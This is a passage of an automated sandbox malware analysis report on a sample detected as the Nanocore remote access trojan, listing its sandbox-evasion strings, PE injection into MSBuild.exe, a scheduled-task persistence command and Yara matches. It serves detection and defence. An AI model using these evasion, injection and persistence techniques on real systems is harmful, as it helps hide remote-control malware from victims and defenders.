        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
        Source: qnJXJsqt1M.exe, 00000000.00000003.237907069.0000000001686000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXEI0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: threadDelayed 407
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: foregroundWindowGot 921
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 2116Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 972Thread sleep time: -160000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 5016Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 4364Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B21B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F56F FindFirstFileW,FindClose,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D96CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: MSBuild.exe, 00000001.00000002.500546420.0000000001188000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6>
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.263480131.0000000001004000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfurFkrgm
        Source: qnJXJsqt1M.exe, 00000000.00000003.237907069.0000000001686000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exe
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exeI0
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: qnJXJsqt1M.exe, 00000000.00000003.238668684.0000000001563000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfur
        Source: MSBuild.exe, 00000001.00000002.507773462.00000000066B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B26AAF BlockInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B03920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEE01E LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D405B5 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40175 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40175 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40405 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D40365 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF8189 SetUnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D781AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 402000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 420000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 422000
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: D7E008
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 400000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 402000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 420000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 422000
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 10C8008
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0B106 LogonUserW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B174BB mouse_event,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B171FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: MSBuild.exe, 00000001.00000002.506079771.0000000003478000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: qnJXJsqt1M.exe, MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: MSBuild.exe, 00000001.00000002.506079771.0000000003478000.00000004.00000001.sdmpBinary or memory string: Program Manager@u
        Source: qnJXJsqt1M.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
        Source: MSBuild.exe, 00000001.00000002.501791419.00000000019A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: MSBuild.exe, 00000001.00000002.500546420.0000000001188000.00000004.00000020.sdmpBinary or memory string: Program Managersoft.NET\Framework\v2.0.50727\MSBuild.exeD;
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF65C4 cpuid
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B2091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B4B340 GetUserNameW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPE
        Source: qnJXJsqt1M.exeBinary or memory string: WIN_81
